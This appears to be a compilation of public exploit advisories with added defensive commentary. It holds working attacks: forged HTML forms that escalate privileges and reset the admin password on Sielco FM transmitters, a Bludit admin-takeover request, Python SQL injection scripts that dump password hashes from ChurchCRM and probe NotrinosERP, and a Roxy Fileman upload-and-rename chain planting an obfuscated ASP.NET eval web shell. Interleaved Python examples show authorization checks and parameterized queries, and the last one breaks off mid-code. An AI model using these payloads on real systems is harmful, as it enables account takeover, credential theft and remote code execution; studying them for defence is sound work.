<pre><code><!--<br /><br />Sielco Analog FM Transmitter 2.12 Remote Privilege Escalation<br /><br /><br />Vendor: Sielco S.r.l<br />Product web page: https://www.sielco.org<br />Affected version: 2.12 (EXC5000GX)<br /> 2.12 (EXC120GX)<br /> 2.11 (EXC300GX)<br /> 2.10 (EXC1600GX)<br /> 2.10 (EXC2000GX)<br /> 2.08 (EXC1600GX)<br /> 2.08 (EXC1000GX)<br /> 2.07 (EXC3000GX)<br /> 2.06 (EXC5000GX)<br /> 1.7.7 (EXC30GT)<br /> 1.7.4 (EXC300GT)<br /> 1.7.4 (EXC100GT)<br /> 1.7.4 (EXC5000GT)<br /> 1.6.3 (EXC1000GT)<br /> 1.5.4 (EXC120GT)<br /><br />Summary: Sielco designs and produces FM radio transmitters<br />for professional broadcasting. The in-house laboratory develops<br />standard and customised solutions to meet all needs. Whether<br />digital or analogue, each product is studied to ensure reliability,<br />resistance over time and a high standard of safety. Sielco<br />transmitters are distributed throughout the world and serve<br />many radios in Europe, South America, Africa, Oceania and China.<br /><br />Desc: The application suffers from a privilege escalation vulnerability.<br />A user with Read permissions can elevate his/her privileges by sending<br />a HTTP POST request setting the parameter 'auth1' or 'auth2' or 'auth3'<br />to integer value '1' for Write or '2' for Admin permissions.<br /><br />Tested on: lwIP/2.1.1<br /> Web/3.0.3<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5755<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5755.php<br /><br /><br />26.01.2023<br /><br />--><br /><br /><br /><html><br /> <body><br /> <form action="http://transmitter/protect/users.htm" method="POST"><br /> <input type="hidden" name="pwd0" value="" /><br /> <input type="hidden" name="pwd0bis" value="" /><br /> <input type="hidden" name="user1" value="" /><br /> <input type="hidden" name="pwd1" value="" /><br /> <input type="hidden" name="pwd1bis" value="" /><br 
/> <input type="hidden" name="auth1" value="" /><br /> <input type="hidden" name="user2" value="test" /><br /> <input type="hidden" name="pwd2" value="" /><br /> <input type="hidden" name="pwd2bis" value="" /><br /> <input type="hidden" name="auth2" value="2" /><br /> <input type="hidden" name="user3" value="" /><br /> <input type="hidden" name="pwd3" value="" /><br /> <input type="hidden" name="pwd3bis" value="" /><br /> <input type="hidden" name="auth3" value="" /><br /> <input type="submit" value="Escalate" /><br /> </form><br /> </body><br /></html><br /></code></pre>
<pre><code><!--<br /><br />Sielco Analog FM Transmitter 2.12 Improper Access Control Change Admin Password<br /><br /><br />Vendor: Sielco S.r.l<br />Product web page: https://www.sielco.org<br />Affected version: 2.12 (EXC5000GX)<br /> 2.12 (EXC120GX)<br /> 2.11 (EXC300GX)<br /> 2.10 (EXC1600GX)<br /> 2.10 (EXC2000GX)<br /> 2.08 (EXC1600GX)<br /> 2.08 (EXC1000GX)<br /> 2.07 (EXC3000GX)<br /> 2.06 (EXC5000GX)<br /> 1.7.7 (EXC30GT)<br /> 1.7.4 (EXC300GT)<br /> 1.7.4 (EXC100GT)<br /> 1.7.4 (EXC5000GT)<br /> 1.6.3 (EXC1000GT)<br /> 1.5.4 (EXC120GT)<br /><br />Summary: Sielco designs and produces FM radio transmitters<br />for professional broadcasting. The in-house laboratory develops<br />standard and customised solutions to meet all needs. Whether<br />digital or analogue, each product is studied to ensure reliability,<br />resistance over time and a high standard of safety. Sielco<br />transmitters are distributed throughout the world and serve<br />many radios in Europe, South America, Africa, Oceania and China.<br /><br />Desc: The application suffers from improper access control when<br />editing users. 
A user with Read permissions can manipulate users,<br />passwords and permissions by sending a single HTTP POST request<br />with modified parameters and edit other users' names, passwords<br />and permissions including admin password.<br /><br />Tested on: lwIP/2.1.1<br /> Web/3.0.3<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5756<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5756.php<br /><br /><br />26.01.2023<br /><br />--><br /><br /><br /><html><br /> <body><br /> <form action="http://transmitter/protect/users.htm" method="POST"><br /> <input type="hidden" name="pwd0" value="PWDCHANGED" /> <!-- This will set/modify admin pwd --><br /> <input type="hidden" name="pwd0bis" value="PWDCHANGED" /> <!-- This will set/modify admin pwd --><br /> <input type="hidden" name="user1" value="" /> <!-- This will set/modify user1 --><br /> <input type="hidden" name="pwd1" value="" /> <!-- This will set/modify user1 pwd --><br /> <input type="hidden" name="pwd1bis" value="" /> <!-- This will set/modify user1 pwd --><br /> <input type="hidden" name="auth1" value="0" /> <!-- This will set user1 read perm --><br /> <input type="hidden" name="user2" value="" /> <!-- This will set/modify user2 --><br /> <input type="hidden" name="pwd2" value="" /> <!-- This will set/modify user2 pwd --><br /> <input type="hidden" name="pwd2bis" value="" /> <!-- This will set/modify user2 pwd --><br /> <input type="hidden" name="auth2" value="0" /> <!-- This will set user2 read perm --><br /> <input type="hidden" name="user3" value="" /> <!-- This will set/modify user3 --><br /> <input type="hidden" name="pwd3" value="" /> <!-- This will set/modify user3 pwd --><br /> <input type="hidden" name="pwd3bis" value="" /> <!-- This will set/modify user3 pwd --><br /> <input type="hidden" name="auth3" value="0" /> <!-- This will set user3 read perm --><br /> <input type="submit" value="Modify 
admin pwd, delete all users" /><br /> </form><br /> </body><br /></html><br /></code></pre>
<pre><code>## Title: Bludit-4.0.0-rc-2 - Release candidate 2 Account takeover: API token vulnerability<br />## Author: nu11secur1ty<br />## Date: 04.11.2013<br />## Vendor: https://www.bludit.com/<br />## Software: https://github.com/bludit/bludit/releases/tag/4.0.0-rc-2<br />## Reference: https://www.cloudflare.com/learning/access-management/account-takeover/<br />## Reference: https://portswigger.net/daily-swig/facebook-account-takeover-researcher-scoops-40k-bug-bounty-for-chained-exploit<br /><br />## Description:<br />An attacker who is already authenticated as an ordinary user can send a normal request<br />to change his own password, then reuse the same JSON `object` together with the<br />vulnerable `API token KEY` in an identical request to change the admin account password.<br />He can then log in as admin and perform any administrative action.<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Exploit:<br />```PUT<br />PUT /api/users/admin HTTP/1.1<br />Host: 127.0.0.1:8000<br />Content-Length: 138<br />sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"<br />sec-ch-ua-platform: "Windows"<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36<br />content-type: application/json<br />Accept: */*<br />Origin: http://127.0.0.1:8000<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://127.0.0.1:8000/admin/edit-user/pwned<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthui<br />Connection: close<br /><br />{"token":"4f8df9f64e84fa4562ec3a604bf7985c","authentication":"6d1a5510a53f9d89325b0cd56a2855a9","username":"pwned","password":"password1"}<br /><br />```<br /><br />[+]Response:<br />```HTTP<br />HTTP/1.1 200 OK<br />Host: 127.0.0.1:8000<br />Date: Tue, 11 Apr 2023 08:33:51 GMT<br />Connection: close<br />X-Powered-By: PHP/7.4.30<br 
/>Access-Control-Allow-Origin: *<br />Content-Type: application/json<br /><br />{"status":"0","message":"User edited.","data":{"key":"admin"}}<br />```<br /><br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bludit/2023/Bludit-v4.0.0-Release-candidate-2)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/w3aa4d)<br /><br />## Time spent:<br />00:57:00<br /></code></pre>
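Both the Sielco advisories (ZSL-2023-5755 and ZSL-2023-5756) and the Bludit report above describe the same server-side omission: a user-management endpoint accepts whatever account, password and permission fields the client sends and applies them without asking whether the caller is allowed to touch that account. The following is an added example, written for this page and not taken from Sielco, Bludit or either advisory, of the object-level authorization such an endpoint needs. It models the users.htm field layout (pwd0/pwd0bis for the admin password, userN/pwdN/pwdNbis/authN for three further accounts, levels 0/1/2 as the advisory names them) and a Bludit-style PUT /api/users/&lt;target&gt; with a JSON body; the handler names, the session table and the demo accounts are assumptions.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass, field
from typing import Dict

READ, WRITE, ADMIN = 0, 1, 2  # permission levels as the Sielco advisory names them


class AuthzError(PermissionError):
    """The acting user is not allowed to make the requested change."""


@dataclass
class User:
    name: str
    level: int
    salt: bytes = field(default_factory=lambda: os.urandom(16))
    pw_hash: bytes = b""

    def _derive(self, password: str) -> bytes:
        return hashlib.pbkdf2_hmac("sha256", password.encode(), self.salt, 100_000)

    def set_password(self, password: str) -> None:
        self.pw_hash = self._derive(password)

    def check_password(self, password: str) -> bool:
        return hmac.compare_digest(self.pw_hash, self._derive(password))


def resolve_actor(users: Dict[str, User], sessions: Dict[str, str], token: str) -> User:
    """Identity comes from the server-side session table only. Anything the client
    puts in the body (Bludit's "username", Sielco's userN) names a *target*; it is
    never evidence of who is asking."""
    name = sessions.get(token)
    if name is None or name not in users:
        raise AuthzError("not authenticated")
    return users[name]


def authorize_edit(actor: User, target: str, change: dict) -> None:
    """Admins may edit (or create) any account. Everyone else may change only
    their own password: not their level, not another account."""
    if actor.level == ADMIN:
        return
    if target != actor.name:
        raise AuthzError(f"{actor.name!r} may not edit account {target!r}")
    if set(change) - {"password"}:
        raise AuthzError("only the password is self-service editable")


def form_to_edits(form: dict) -> Dict[str, dict]:
    """Translate the users.htm field layout into {account: change}.
    Blank fields mean 'leave unchanged'; both password copies must match."""
    edits: Dict[str, dict] = {}
    if form.get("pwd0"):
        if form["pwd0"] != form.get("pwd0bis"):
            raise ValueError("admin password confirmation mismatch")
        edits["admin"] = {"password": form["pwd0"]}
    for n in (1, 2, 3):
        name = form.get(f"user{n}")
        if not name:
            continue
        change: dict = {}
        if form.get(f"pwd{n}"):
            if form[f"pwd{n}"] != form.get(f"pwd{n}bis"):
                raise ValueError(f"password confirmation mismatch for {name!r}")
            change["password"] = form[f"pwd{n}"]
        if form.get(f"auth{n}", "") != "":
            level = int(form[f"auth{n}"])  # non-numeric -> ValueError -> denied
            if level not in (READ, WRITE, ADMIN):
                raise ValueError(f"unknown permission level {level}")
            change["level"] = level
        edits[name] = change
    return edits


def _apply(users: Dict[str, User], target: str, change: dict) -> None:
    user = users.setdefault(target, User(target, READ))  # creation already admin-gated above
    if "password" in change:
        user.set_password(change["password"])
    if "level" in change:
        user.level = change["level"]


def handle_users_form(users, sessions, token, form) -> str:
    """POST users.htm. Returns 'ok' or 'denied: <reason>'. Every edit is authorised
    before any is applied, so one forbidden field voids the whole form."""
    try:
        actor = resolve_actor(users, sessions, token)
        edits = form_to_edits(form)
        for target, change in edits.items():
            authorize_edit(actor, target, change)
    except (AuthzError, ValueError) as e:
        return f"denied: {e}"
    for target, change in edits.items():
        _apply(users, target, change)
    return "ok"


def handle_api_user_put(users, sessions, token, target, body: dict) -> str:
    """PUT /api/users/<target>. The body's own "username" field is ignored."""
    change = {k: body[k] for k in ("password", "level") if k in body}
    try:
        authorize_edit(resolve_actor(users, sessions, token), target, change)
    except AuthzError as e:
        return f"denied: {e}"
    _apply(users, target, change)
    return "ok"


def demo_state():
    """Constructed accounts and session table for trying the handlers."""
    users = {"admin": User("admin", ADMIN), "test": User("test", READ)}
    users["admin"].set_password("constructed-admin-pw")
    users["test"].set_password("constructed-test-pw")
    return users, {"tok-admin": "admin", "tok-test": "test"}
```

With this check in place the two requests shown in the advisories fail the same way: a Read user naming itself as user2 with auth2=2 is refused because a non-admin may not change a level, and a Read user (or a Bludit user holding a valid API token) submitting pwd0 or PUT /api/users/admin is refused because the target is not the caller's own account. Authorising the whole form before applying any of it matters for the second Sielco report, where a single request mixes an admin password change with edits to every other account.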
<pre><code># Exploit Title: ChurchCRM 4.5.1 - Authenticated SQL Injection<br /># Date: 11-03-2023<br /># Exploit Author: Arvandy<br /># Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24787/CVE-2023-24787.md<br /># Software Link: https://github.com/ChurchCRM/CRM/releases<br /># Vendor Homepage: http://churchcrm.io/<br /># Version: 4.5.1<br /># Tested on: Windows, Linux<br /># CVE: CVE-2023-24787<br /><br />"""<br />The endpoint /EventAttendance.php is vulnerable to Authenticated SQL Injection (Union-based and Blind-based) via the Event GET parameter.<br />This endpoint can be triggered through the following menu: Events - Event Attendance Reports - Church Service/Sunday School. <br />The Event Parameter is taken directly from the query string and passed into the SQL query without any sanitization or input escaping.<br />This allows the attacker to inject malicious Event payloads to execute the malicious SQL query.<br /><br />This script is created as Proof of Concept to retrieve the username and password hash from user_usr table.<br />"""<br /><br /><br />import sys, requests<br /><br />def dumpUserTable(target, session_cookies): <br /> print("(+) Retrieving username and password")<br /> print("")<br /> url = "%s/EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT('Perseverance',usr_Username,':',usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday School" % (target)<br /> headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)} <br /> r = requests.get(url, headers=headers)<br /> lines = r.text.splitlines()<br /> <br /> for line in lines: <br /> if "<td >Perseverance" in line:<br /> print(line.split("Perseverance")[1].split("</td>")[0])<br /> <br />def login(target, username, password):<br /> target = "%s/session/begin" % (target)<br /> headers = {'Content-Type': 'application/x-www-form-urlencoded'}<br /> data = 
"User=%s&Password=%s" % (username, password)<br /> s = requests.session()<br /> r = s.post(target, data = data, headers = headers)<br /> return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08')<br /><br />def main():<br /> print("(!) Login to the target application")<br /> session_cookies = login(target, username, password) <br /> <br /> print("(!) Exploiting the Auth SQL Injection to retrieve the username and password hash")<br /> dumpUserTable(target, session_cookies)<br /><br /> <br />if __name__ == "__main__":<br /> if len(sys.argv) != 4:<br /> print("(!) Usage: python3 exploit.py <URL> <username> <password>")<br /> print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass")<br /> sys.exit(-1)<br /><br /> target = sys.argv[1]<br /> username = sys.argv[2]<br /> password = sys.argv[3]<br /> <br /> main()<br /></code></pre>
<pre><code># Exploit Title: NotrinosERP 0.7 - Authenticated Blind SQL Injection<br /># Date: 11-03-2023<br /># Exploit Author: Arvandy<br /># Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24788/CVE-2023-24788.md<br /># Software Link: https://github.com/notrinos/NotrinosERP/releases/tag/0.7<br /># Vendor Homepage: https://notrinos.com/<br /># Version: 0.7<br /># Tested on: Windows, Linux<br /># CVE: CVE-2023-24788<br /><br />"""<br />The endpoint /sales/customer_delivery.php is vulnerable to Authenticated Blind SQL Injection (Time-based) via the GET parameter OrderNumber. <br />This endpoint can be triggered through the following menu: Sales - Sales Order Entry - Place Order - Make Delivery Against This Order.<br />The OrderNumber parameter requires a valid order number value.<br /><br />This script is created as Proof of Concept to retrieve the database name and version through the Blind SQL Injection discovered in the application.<br />"""<br /><br /><br />import sys, requests<br /><br />def injection(target, inj_str, session_cookies): <br /> for j in range(32, 126):<br /> url = "%s/sales/customer_delivery.php?OrderNumber=%s" % (target, inj_str.replace("[CHAR]", str(j)))<br /> headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)} <br /> r = requests.get(url, headers=headers)<br /> res = r.text<br /> if "NotrinosERP 0.7 - Login" in res:<br /> session_cookies = login(target, username, password)<br /> headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)}<br /> r = requests.get(url, headers=headers)<br /> elif (r.elapsed.total_seconds () > 2 ):<br /> return j<br /> return None<br /><br />def login(target, username, password):<br /> target = "%s/index.php" % (target)<br /> headers = {'Content-Type': 'application/x-www-form-urlencoded'}<br /> data = 
"user_name_entry_field=%s&password=%s&company_login_name=0" % (username, password)<br /> s = requests.session()<br /> r = s.post(target, data = data, headers = headers)<br /> return s.cookies.get('Notrinos2938c152fda6be29ce4d5ac3a638a781')<br /> <br />def retrieveDBName(session_cookies): <br /> db_name = ""<br /> print("(+) Retrieving database name")<br /> for i in range (1,100):<br /> injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i<br /> retrieved_value = injection(target, injection_str, session_cookies)<br /> if (retrieved_value):<br /> db_name += chr(retrieved_value) <br /> else:<br /> break<br /> print("Database Name: "+db_name) <br /><br />def retrieveDBVersion(session_cookies):<br /> db_version = ""<br /> print("(+) Retrieving database version")<br /> for i in range (1,100):<br /> injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i<br /> retrieved_value = injection(target, injection_str, session_cookies)<br /> if (retrieved_value):<br /> db_version += chr(retrieved_value)<br /> sys.stdout.flush()<br /> else:<br /> break<br /> print("Database Version: "+db_version)<br /><br />def main():<br /> print("(!) Login to the target application")<br /> session_cookies = login(target, username, password) <br /> <br /> print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions")<br /> retrieveDBName(session_cookies)<br /> print("")<br /> retrieveDBVersion(session_cookies)<br /> <br />if __name__ == "__main__":<br /> if len(sys.argv) != 4:<br /> print("(!) Usage: python3 exploit.py <URL> <username> <password>")<br /> print("(!) E.g.,: python3 exploit.py http://192.168.1.100/NotrinosERP user pass")<br /> sys.exit(-1)<br /><br /> target = sys.argv[1]<br /> username = sys.argv[2]<br /> password = sys.argv[3]<br /> <br /> main()<br /></code></pre>
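The ChurchCRM (CVE-2023-24787) and NotrinosERP (CVE-2023-24788) reports above share one root cause: a numeric request parameter (Event, OrderNumber) is concatenated into the SQL text, so the engine parses attacker-supplied text as part of the query. The example below is added for this page and is not code from either project; it reproduces the defect against an in-memory SQLite database with constructed rows, then shows the two controls that close it: a type check on the parameter before it reaches the database layer, and a bound parameter so the value is transmitted as data. The table and column names, the payload strings (rewritten in SQLite syntax, since SQLite has neither CONCAT nor SLEEP) and the handler name are assumptions.

```python
import re
import sqlite3
from typing import List, Tuple

# Constructed payloads in the shape of the two advisories, rewritten for SQLite
# (|| instead of CONCAT; SQLite has no SLEEP(), so the second one would just error).
UNION_PAYLOAD = "2 UNION ALL SELECT 1, usr_Username || ':' || usr_Password FROM user_usr"
BLIND_PAYLOAD = "15 UNION SELECT IF(ASCII(SUBSTRING((SELECT DATABASE()),1,1))=65,SLEEP(2),null)-- -"


def make_demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the application database (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE event_attendance (event_id INTEGER, person TEXT);
        CREATE TABLE user_usr (usr_Username TEXT, usr_Password TEXT);
        INSERT INTO event_attendance VALUES (1, 'alice'), (2, 'bob'), (2, 'carol');
        INSERT INTO user_usr VALUES ('admin', 'constructed-hash-1'), ('user', 'constructed-hash-2');
    """)
    return conn


def vulnerable_event_query(conn: sqlite3.Connection, event: str) -> List[Tuple]:
    """The defect behind both advisories: the request parameter is spliced into SQL text."""
    sql = "SELECT event_id, person FROM event_attendance WHERE event_id = " + event
    return conn.execute(sql).fetchall()


EVENT_ID = re.compile(r"[0-9]{1,9}")


def parse_event_id(raw: str) -> int:
    """Type-check the parameter before it goes anywhere near the database."""
    if not EVENT_ID.fullmatch(raw):
        raise ValueError("Event must be a positive integer")
    return int(raw)


def safe_event_query(conn: sqlite3.Connection, event_id: int) -> List[Tuple]:
    """Bound parameter: the value travels to the engine as data, never as SQL."""
    return conn.execute(
        "SELECT event_id, person FROM event_attendance WHERE event_id = ?", (event_id,)
    ).fetchall()


def handle_request(conn: sqlite3.Connection, raw_event: str) -> Tuple[str, List[Tuple]]:
    """What the endpoint should do: reject anything that is not an id, then bind."""
    try:
        event_id = parse_event_id(raw_event)
    except ValueError:
        return ("rejected", [])
    return ("ok", safe_event_query(conn, event_id))
```

Run against the demo database, the concatenated query returns the attendance rows plus one row per user_usr entry, which is exactly the column the ChurchCRM script scrapes out of the HTML; the hardened handler rejects both payloads before a query is built. The parameter binding is the control that works on its own; the integer check is cheap defence in depth and also produces a clear 400-class error instead of a database exception. For PHP code bases such as these two, the equivalent is PDO or mysqli prepared statements with placeholders.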
<pre><code># Exploit Title: Roxy Fileman 1.4.5 For .NET Arbitrary File Upload<br /># Date: 09/04/2023<br /># Exploit Author: Zer0FauLT [admindeepsec@proton.me]<br /># Vendor Homepage: roxyfileman.com<br /># Software Link: https://web.archive.org/web/20190317053437/http://roxyfileman.com/download.php?f=1.4.5-net<br /># Version: <= 1.4.5<br /># Tested on: Windows 10 and Windows Server 2019<br /># CVE : 0DAY<br /><br />##########################################################################################<br /># First, we upload the .jpg shell file to the server. #<br />##########################################################################################<br /><br />POST /admin/fileman/asp_net/main.ashx?a=UPLOAD HTTP/2<br />Host: pentest.com<br />Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest<br />Content-Length: 666<br />Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"<br />Accept: */*<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygOxjsc2hpmwmISeJ<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36<br />Sec-Ch-Ua-Platform: "Windows"<br />Origin: https://pentest.com<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://pentest.com/admin/fileman/index.aspx<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br /><br />------WebKitFormBoundarygOxjsc2hpmwmISeJ<br />Content-Disposition: form-data; name="action"<br /><br />upload<br />------WebKitFormBoundarygOxjsc2hpmwmISeJ<br />Content-Disposition: form-data; name="method"<br /><br />ajax<br />------WebKitFormBoundarygOxjsc2hpmwmISeJ<br />Content-Disposition: form-data; name="d"<br /><br />/Upload/PenTest<br />------WebKitFormBoundarygOxjsc2hpmwmISeJ<br 
/>Content-Disposition: form-data; name="files[]"; filename="test.jpg"<br />Content-Type: image/jpeg<br /><br />‰PNG<br /><%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %><br /><%var PAY:String=<br />Request["\x61\x62\x63\x64"];eval<br />(PAY,"\x75\x6E\x73\x61"+<br />"\x66\x65");%><br />------WebKitFormBoundarygOxjsc2hpmwmISeJ--<br /><br />##########################################################################################<br /># In the second stage, we manipulate the .jpg file that we uploaded to the server. #<br />##########################################################################################<br /><br />{<br />"FILES_ROOT": "",<br />"RETURN_URL_PREFIX": "",<br />"SESSION_PATH_KEY": "",<br />"THUMBS_VIEW_WIDTH": "140",<br />"THUMBS_VIEW_HEIGHT": "120",<br />"PREVIEW_THUMB_WIDTH": "300",<br />"PREVIEW_THUMB_HEIGHT":"200",<br />"MAX_IMAGE_WIDTH": "1000",<br />"MAX_IMAGE_HEIGHT": "1000",<br />"INTEGRATION": "ckeditor",<br />"DIRLIST": "asp_net/main.ashx?a=DIRLIST",<br />"CREATEDIR": "asp_net/main.ashx?a=CREATEDIR",<br />"DELETEDIR": "asp_net/main.ashx?a=DELETEDIR",<br />"MOVEDIR": "asp_net/main.ashx?a=MOVEDIR",<br />"COPYDIR": "asp_net/main.ashx?a=COPYDIR",<br />"RENAMEDIR": "asp_net/main.ashx?a=RENAMEDIR",<br />"FILESLIST": "asp_net/main.ashx?a=FILESLIST",<br />"UPLOAD": "asp_net/main.ashx?a=UPLOAD",<br />"DOWNLOAD": "asp_net/main.ashx?a=DOWNLOAD",<br />"DOWNLOADDIR": "asp_net/main.ashx?a=DOWNLOADDIR",<br />"DELETEFILE": "asp_net/main.ashx?a=DELETEFILE",<br />"MOVEFILE": "asp_net/main.ashx?a=MOVEFILE",<br />"COPYFILE": "asp_net/main.ashx?a=COPYFILE",<br />"RENAMEFILE": "asp_net/main.ashx?a=RENAMEFILE",<br />"GENERATETHUMB": "asp_net/main.ashx?a=GENERATETHUMB",<br />"DEFAULTVIEW": "list",<br />"FORBIDDEN_UPLOADS": "zip js jsp jsb mhtml mht xhtml xht php phtml php3 php4 php5 phps shtml jhtml pl sh py cgi exe application gadget hta cpl msc jar vb jse ws wsf wsc wsh ps1 ps2 psc1 psc2 msh msh1 msh2 inf reg scf msp scr dll msi 
vbs bat com pif cmd vxd cpl htpasswd htaccess",<br />"ALLOWED_UPLOADS": "bmp gif png jpg jpeg",<br />"FILEPERMISSIONS": "0644",<br />"DIRPERMISSIONS": "0755",<br />"LANG": "auto",<br />"DATEFORMAT": "dd/MM/yyyy HH:mm",<br />"OPEN_LAST_DIR": "yes"<br />}<br /><br />############################################################################################################################################################################################################################<br /># Using the rename function, we replace the "asp_net/main.ashx?a=RENAMEFILE" endpoint with the "asp_net/main.ashx?a=MOVEFILE" endpoint and manipulate the source and destination paths on the server as follows. #<br />############################################################################################################################################################################################################################<br /><br />POST /admin/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx HTTP/2<br />Host: pentest.com<br />Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest<br />Content-Length: 44<br />Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"<br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36<br />Sec-Ch-Ua-Platform: "Windows"<br />Origin: https://pentest.com<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://pentest.com/admin/fileman/index.aspx<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br /><br 
/>f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx<br /><br />===========================================================================================================================================================================================================================<br /><br />POST /admin/fileman/asp_net/main.ashx?a=MOVEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx HTTP/2<br />Host: pentest.com<br />Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest<br />Content-Length: 68<br />Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"<br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36<br />Sec-Ch-Ua-Platform: "Windows"<br />Origin: https://pentest.com<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://pentest.com/admin/fileman/index.aspx<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br /><br />f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx<br /><br />##########################################################################################<br /># and it's done! 
#<br />##########################################################################################<br /><br />HTTP/2 200 OK<br />Cache-Control: private<br />Content-Type: text/html; charset=utf-8<br />Vary: Accept-Encoding<br />Server: Microsoft-IIS/10.0<br />X-Aspnet-Version: 4.0.30319<br />X-Powered-By-Plesk: PleskWin<br />Date: Sun, 09 Apr 2023 09:49:34 GMT<br />Content-Length: 21<br /><br />{"res":"ok","msg":""}<br /><br />=============================================================================================<br /></code></pre>
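The Roxy Fileman walkthrough above shows why an upload-time check is not enough on its own: the file passes the upload filter as test.jpg (it even starts with a PNG signature, so content sniffing would pass too), and the extension only becomes .aspx through the later MOVEFILE step. The example below is added for this page and is not Roxy Fileman's code; it shows a single naming policy applied to the destination name of every file operation (UPLOAD, RENAMEFILE, MOVEFILE, COPYFILE), together with a root-containment check on the paths. It uses the ALLOWED_UPLOADS list from the configuration shown above and an abridged copy of the FORBIDDEN_UPLOADS list; the FILES_ROOT value, the function names and the parameter conventions (f and n as in main.ashx) are assumptions.

```python
import posixpath

FILES_ROOT = "/Upload"  # assumed: the configuration above leaves FILES_ROOT empty

# The allow-list from the ROXY configuration above, plus an abridged copy of its
# deny-list. Note that the deny-list never mentions aspx/ashx/asp, so it cannot
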